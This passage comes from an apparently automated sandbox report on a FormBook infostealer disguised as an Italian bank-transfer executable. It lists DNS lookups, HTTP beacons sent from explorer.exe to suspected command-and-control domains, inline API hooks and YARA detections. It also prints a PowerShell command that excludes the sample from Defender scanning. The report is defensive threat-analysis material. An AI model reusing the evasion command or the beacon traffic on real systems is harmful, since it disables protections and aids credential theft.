                                Jun 21, 2024 16:15:29.826004982 CEST53638891.1.1.1192.168.2.11
                                Jun 21, 2024 16:15:49.879703999 CEST6373853192.168.2.111.1.1.1
                                Jun 21, 2024 16:15:50.116858959 CEST53637381.1.1.1192.168.2.11
                                Jun 21, 2024 16:16:10.396253109 CEST6069553192.168.2.111.1.1.1
                                Jun 21, 2024 16:16:10.898818970 CEST53606951.1.1.1192.168.2.11
                                Jun 21, 2024 16:16:30.942338943 CEST5899953192.168.2.111.1.1.1
                                Jun 21, 2024 16:16:30.988584995 CEST53589991.1.1.1192.168.2.11
                                Jun 21, 2024 16:16:51.409219027 CEST6014553192.168.2.111.1.1.1
                                Jun 21, 2024 16:16:51.495197058 CEST53601451.1.1.1192.168.2.11
                                Jun 21, 2024 16:17:12.088498116 CEST5449453192.168.2.111.1.1.1
                                Jun 21, 2024 16:17:12.104652882 CEST53544941.1.1.1192.168.2.11
                                Jun 21, 2024 16:17:32.586893082 CEST5641253192.168.2.111.1.1.1
                                Jun 21, 2024 16:17:32.665529966 CEST53564121.1.1.1192.168.2.11
                                Jun 21, 2024 16:18:15.930248022 CEST5614053192.168.2.111.1.1.1
                                Jun 21, 2024 16:18:16.649178982 CEST53561401.1.1.1192.168.2.11

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jun 21, 2024 16:14:50.236855984 CEST192.168.2.111.1.1.10xc31eStandard query (0)www.jnhdh8827.comA (IP address)IN (0x0001)false
                                Jun 21, 2024 16:15:10.846163034 CEST192.168.2.111.1.1.10x3f91Standard query (0)www.loyalbahis356.comA (IP address)IN (0x0001)false
                                Jun 21, 2024 16:15:29.673865080 CEST192.168.2.111.1.1.10x47c8Standard query (0)www.sxybet88.comA (IP address)IN (0x0001)false
                                Jun 21, 2024 16:15:49.879703999 CEST192.168.2.111.1.1.10xe316Standard query (0)www.ainth.comA (IP address)IN (0x0001)false
                                Jun 21, 2024 16:16:10.396253109 CEST192.168.2.111.1.1.10x9ffStandard query (0)www.motchillssss.topA (IP address)IN (0x0001)false
                                Jun 21, 2024 16:16:30.942338943 CEST192.168.2.111.1.1.10xc2a7Standard query (0)www.hemophilia-treatment-41433.bondA (IP address)IN (0x0001)false
                                Jun 21, 2024 16:16:51.409219027 CEST192.168.2.111.1.1.10x6822Standard query (0)www.paucanyes.comA (IP address)IN (0x0001)false
                                Jun 21, 2024 16:17:12.088498116 CEST192.168.2.111.1.1.10x8c18Standard query (0)www.ombak99.lolA (IP address)IN (0x0001)false
                                Jun 21, 2024 16:17:32.586893082 CEST192.168.2.111.1.1.10x40fStandard query (0)www.shuaninvolved.siteA (IP address)IN (0x0001)false
                                Jun 21, 2024 16:18:15.930248022 CEST192.168.2.111.1.1.10xa72dStandard query (0)www.meidupro.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jun 21, 2024 16:14:50.286693096 CEST1.1.1.1192.168.2.110xc31eNo error (0)www.jnhdh8827.com188.114.96.3A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:14:50.286693096 CEST1.1.1.1192.168.2.110xc31eNo error (0)www.jnhdh8827.com188.114.97.3A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:15:11.005785942 CEST1.1.1.1192.168.2.110x3f91No error (0)www.loyalbahis356.com185.148.106.71A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:15:11.005785942 CEST1.1.1.1192.168.2.110x3f91No error (0)www.loyalbahis356.com185.148.106.70A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:15:29.826004982 CEST1.1.1.1192.168.2.110x47c8No error (0)www.sxybet88.com188.114.97.3A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:15:29.826004982 CEST1.1.1.1192.168.2.110x47c8No error (0)www.sxybet88.com188.114.96.3A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:15:50.116858959 CEST1.1.1.1192.168.2.110xe316No error (0)www.ainth.com3.64.163.50A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:16:10.898818970 CEST1.1.1.1192.168.2.110x9ffNo error (0)www.motchillssss.top172.67.158.16A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:16:10.898818970 CEST1.1.1.1192.168.2.110x9ffNo error (0)www.motchillssss.top104.21.33.26A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:16:30.988584995 CEST1.1.1.1192.168.2.110xc2a7No error (0)www.hemophilia-treatment-41433.bond185.53.179.92A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:16:51.495197058 CEST1.1.1.1192.168.2.110x6822No error (0)www.paucanyes.com103.169.142.0A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:17:12.104652882 CEST1.1.1.1192.168.2.110x8c18No error (0)www.ombak99.lolombak99.lolCNAME (Canonical name)IN (0x0001)false
                                Jun 21, 2024 16:17:12.104652882 CEST1.1.1.1192.168.2.110x8c18No error (0)ombak99.lol192.64.118.107A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:17:32.665529966 CEST1.1.1.1192.168.2.110x40fNo error (0)www.shuaninvolved.site188.114.96.3A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:17:32.665529966 CEST1.1.1.1192.168.2.110x40fNo error (0)www.shuaninvolved.site188.114.97.3A (IP address)IN (0x0001)false
                                Jun 21, 2024 16:18:16.649178982 CEST1.1.1.1192.168.2.110xa72dNo error (0)www.meidupro.com107.158.172.173A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • www.jnhdh8827.com
                                • www.loyalbahis356.com
                                • www.sxybet88.com
                                • www.ainth.com
                                • www.motchillssss.top
                                • www.hemophilia-treatment-41433.bond
                                • www.paucanyes.com
                                • www.ombak99.lol
                                • www.shuaninvolved.site

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.1149716188.114.96.3802592C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Jun 21, 2024 16:14:50.292768955 CEST168OUTGET /pz12/?Ft6LPF=tXrQrgXPfQCqrAqcdoT/KCxiftMWx+uc6jO1VE/0fl1BeE1n2goaTZbQHU/iA/QpxM3q&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.jnhdh8827.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.1164860185.148.106.71802592C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Jun 21, 2024 16:15:11.016506910 CEST172OUTGET /pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.loyalbahis356.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 21, 2024 16:15:12.509788990 CEST1181INHTTP/1.1 301 Moved Permanently
                                Date: Fri, 21 Jun 2024 14:15:11 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 21 Jun 2024 15:15:11 GMT
                                Location: https://loyalbahis356.com/pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu
                                Set-Cookie: __cf_bm=2lLqNs2SKCx1Xu0IOb9AFqa17EzDs608CriSQeApRGc-1718979311-1.0.1.1-nK_wDYDzKFDXioN3Kfpx9wF6Ugt3dVArlnAt.sKPtq5QcPZeX8xLnmBA45TRM3tt07tLWTZ043_VgmkM1OZA1A; path=/; expires=Fri, 21-Jun-24 14:45:11 GMT; domain=.loyalbahis356.com; HttpOnly
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJRoLeU55y12qFbWCI7HpP9Nhc0ZIXhCX7%2F3ogdI6JKmjTnOex%2FGxQZOtmQH6FHGTQ%2F%2BULdcRdvHT2vdHTvUxitQDNmoJJbtHHqOvMX7uX58vJ2AwQpie1Y%2FExIelb3ds7kjm%2FCOXOY%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89749bf86ef54414-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                Jun 21, 2024 16:15:12.510029078 CEST1181INHTTP/1.1 301 Moved Permanently
                                Date: Fri, 21 Jun 2024 14:15:11 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 21 Jun 2024 15:15:11 GMT
                                Location: https://loyalbahis356.com/pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu
                                Set-Cookie: __cf_bm=2lLqNs2SKCx1Xu0IOb9AFqa17EzDs608CriSQeApRGc-1718979311-1.0.1.1-nK_wDYDzKFDXioN3Kfpx9wF6Ugt3dVArlnAt.sKPtq5QcPZeX8xLnmBA45TRM3tt07tLWTZ043_VgmkM1OZA1A; path=/; expires=Fri, 21-Jun-24 14:45:11 GMT; domain=.loyalbahis356.com; HttpOnly
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJRoLeU55y12qFbWCI7HpP9Nhc0ZIXhCX7%2F3ogdI6JKmjTnOex%2FGxQZOtmQH6FHGTQ%2F%2BULdcRdvHT2vdHTvUxitQDNmoJJbtHHqOvMX7uX58vJ2AwQpie1Y%2FExIelb3ds7kjm%2FCOXOY%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89749bf86ef54414-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                Jun 21, 2024 16:15:12.510895967 CEST1181INHTTP/1.1 301 Moved Permanently
                                Date: Fri, 21 Jun 2024 14:15:11 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 21 Jun 2024 15:15:11 GMT
                                Location: https://loyalbahis356.com/pz12/?Ft6LPF=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/+38lrQrf/b9xTaJsLm+Z3/RBaY9IBcU0d9A8jH&Ev2=OjrLPv0Hh4WLu
                                Set-Cookie: __cf_bm=2lLqNs2SKCx1Xu0IOb9AFqa17EzDs608CriSQeApRGc-1718979311-1.0.1.1-nK_wDYDzKFDXioN3Kfpx9wF6Ugt3dVArlnAt.sKPtq5QcPZeX8xLnmBA45TRM3tt07tLWTZ043_VgmkM1OZA1A; path=/; expires=Fri, 21-Jun-24 14:45:11 GMT; domain=.loyalbahis356.com; HttpOnly
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UJRoLeU55y12qFbWCI7HpP9Nhc0ZIXhCX7%2F3ogdI6JKmjTnOex%2FGxQZOtmQH6FHGTQ%2F%2BULdcRdvHT2vdHTvUxitQDNmoJJbtHHqOvMX7uX58vJ2AwQpie1Y%2FExIelb3ds7kjm%2FCOXOY%3D"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89749bf86ef54414-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.1164861188.114.97.3802592C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Jun 21, 2024 16:15:29.832153082 CEST167OUTGET /pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.sxybet88.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 21, 2024 16:15:30.291491032 CEST905INHTTP/1.1 301 Moved Permanently
                                Date: Fri, 21 Jun 2024 14:15:30 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 21 Jun 2024 15:15:30 GMT
                                Location: https://www.sxybet88.com/pz12/?Ft6LPF=oomdQ+KKoNdRQ1HBV3YuY4HYSwe0GXxiurC4ZPs5qTfDQPHef20Z2PpAaiNPivFMepGH&Ev2=OjrLPv0Hh4WLu
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aYHXtDyKE2o7nBb9dw6YtkFmJhoX6QEJiDLEQf7HxqJtr2Sb8gIwvVZdXLTZbjOcHHkCJpy0uHFLigYTySl6KfCk8hzeqN8UjvxvjHDHAsUWDKweJyEqvjOwny1tYKHulP1d"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89749c6df8e84205-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.11648623.64.163.50802592C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Jun 21, 2024 16:15:50.125619888 CEST164OUTGET /pz12/?Ft6LPF=wKkXOPvX+avhNB0WpobAo/RdD5Vgm0uLsJUbUuPKtyZfimvU+K3iz8PSEmeh48r72CNx&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.ainth.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.1164863172.67.158.16802592C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Jun 21, 2024 16:16:10.912575006 CEST171OUTGET /pz12/?Ft6LPF=bG4RJrnXbim/D3cBlUwrMYqb2ZS77l+Go/8AkclYnXcXK2JRZ8TcvaCLEE/32UP8PfnZ&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.motchillssss.top
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.1164864185.53.179.92802592C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Jun 21, 2024 16:16:30.997720003 CEST186OUTGET /pz12/?Ft6LPF=I28W/3a7leZLTJTVQ6pLzOFASFQBM/RHJVT607x5WCzJ2jZGT2NOi6Mb2MIHH5pYEuLB&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.hemophilia-treatment-41433.bond
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.1164865103.169.142.0802592C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Jun 21, 2024 16:16:51.501354933 CEST168OUTGET /pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.paucanyes.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 21, 2024 16:16:51.995676994 CEST749INHTTP/1.1 301 Moved Permanently
                                Date: Fri, 21 Jun 2024 14:16:51 GMT
                                Content-Type: text/html
                                Content-Length: 167
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 21 Jun 2024 15:16:51 GMT
                                Location: https://www.paucanyes.com/pz12/?Ft6LPF=wmB39g7fMVvhAuIXrcacNlSYByOKhXrL5caurGICgekgrDmbedkAGJpMCJINZ+FV4qAD&Ev2=OjrLPv0Hh4WLu
                                expect-ct: max-age=86400, enforce
                                referrer-policy: same-origin
                                x-content-type-options: nosniff
                                x-frame-options: SAMEORIGIN
                                x-xss-protection: 1; mode=block
                                Server: cloudflare
                                CF-RAY: 89749e6c8b7f1881-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.1164866192.64.118.107802592C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Jun 21, 2024 16:17:12.110812902 CEST166OUTGET /pz12/?Ft6LPF=oHprbzlDionZVyQ1tKhLJIMMM9VbSt1+94xivpjLAu060YRgv/mETNkmThmCujjhO3iW&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.ombak99.lol
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.1164867188.114.96.3802592C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                Jun 21, 2024 16:17:32.715564013 CEST173OUTGET /pz12/?Ft6LPF=QmILE5Yj5FPxS0L9f6nor9rKO5Y2+RnVUWg4I1d5MMTzUgBssQh0GRAykt5Xu8CyVf+z&Ev2=OjrLPv0Hh4WLu HTTP/1.1
                                Host: www.shuaninvolved.site
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jun 21, 2024 16:17:33.188185930 CEST867INHTTP/1.1 404 Not Found
                                Date: Fri, 21 Jun 2024 14:17:33 GMT
                                Content-Type: text/html; charset=iso-8859-1
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLQJlLW8SkiYBMHFnts7gjykOqYs3BXybBPpNHRFAkouMnNPt1KPTATlxh6ESQYSk3GYuqdaepawogs7EV8f%2F3l%2BmF8Z3w1gryXSxlCXOgKcVQrt4NZ6A%2BGoGhFbJkrjkIlHLDCdoW9N"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89749f6dddaf4375-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 31 30 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 68 75 61 6e 69 6e 76 6f 6c 76 65 64 2e 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                Data Ascii: 10c<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.shuaninvolved.site Port 80</address></body></html>
                                Jun 21, 2024 16:17:33.188211918 CEST5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Code Manipulations

                                User Modules

                                Hook Summary

                                Function NameHook TypeActive in Processes
                                PeekMessageAINLINEexplorer.exe
                                PeekMessageWINLINEexplorer.exe
                                GetMessageWINLINEexplorer.exe
                                GetMessageAINLINEexplorer.exe

                                Processes

                                Process: explorer.exe, Module: user32.dll
                                Function NameHook TypeNew Data
                                PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEA
                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEA
                                GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEA

                                Statistics

                                CPU Usage

                                Click to jump to process

                                Memory Usage

                                Click to jump to process

                                High Level Behavior Distribution

                                Click to dive into process behavior distribution

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:10:14:05
                                Start date:21/06/2024
                                Path:C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0x260000
                                File size:643'584 bytes
                                MD5 hash:6B799C2E76B37BF96EF35BA8580F0BFC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1362056479.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:3
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0x100000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:4
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff68cce0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:5
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0xc0000
                                File size:643'584 bytes
                                MD5 hash:6B799C2E76B37BF96EF35BA8580F0BFC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                General

                                Target ID:6
                                Start time:10:14:11
                                Start date:21/06/2024
                                Path:C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.exe"
                                Imagebase:0x5f0000
                                File size:643'584 bytes
                                MD5 hash:6B799C2E76B37BF96EF35BA8580F0BFC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.1420736628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
